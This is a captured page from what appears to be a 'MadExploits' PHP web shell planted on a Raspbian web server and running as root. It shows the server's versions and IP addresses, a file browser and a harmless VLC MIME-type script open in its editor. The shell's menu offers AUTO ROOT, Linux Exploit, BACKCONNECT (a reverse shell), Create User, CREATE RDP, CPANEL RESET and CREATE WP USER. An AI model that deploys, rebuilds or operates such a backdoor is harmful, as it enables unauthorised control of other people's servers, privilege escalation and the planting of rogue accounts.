Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
vlc /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
audio-vlc-default.sh
620
B
-rwxr-xr-x
gnome-vlc-default.sh
873
B
-rwxr-xr-x
video-vlc-default.sh
620
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : audio-vlc-default.sh
#!/bin/sh # $Id$ # # Copyright © 2007 VideoLAN team # # Authors: http://forum.videolan.org/viewtopic.php?f=13&t=40560 # Rafaël Carré <funman@videolanorg> # # Sets VLC media player the default application for audio mime types # on a freedesktop compliant desktop # MIME_FILE=~/.local/share/applications/defaults.list if [ ! -f $MIME_FILE ] then echo "[Default Applications]" > $MIME_FILE else grep -v 'audio/' $MIME_FILE > /tmp/vlc.defaults.list.tmp mv /tmp/vlc.defaults.list.tmp $MIME_FILE fi ls /usr/share/mime/audio/* | sed -e 's@/usr/share/mime/@@' -e 's/\.xml/=vlc.desktop/' >> $MIME_FILE
Close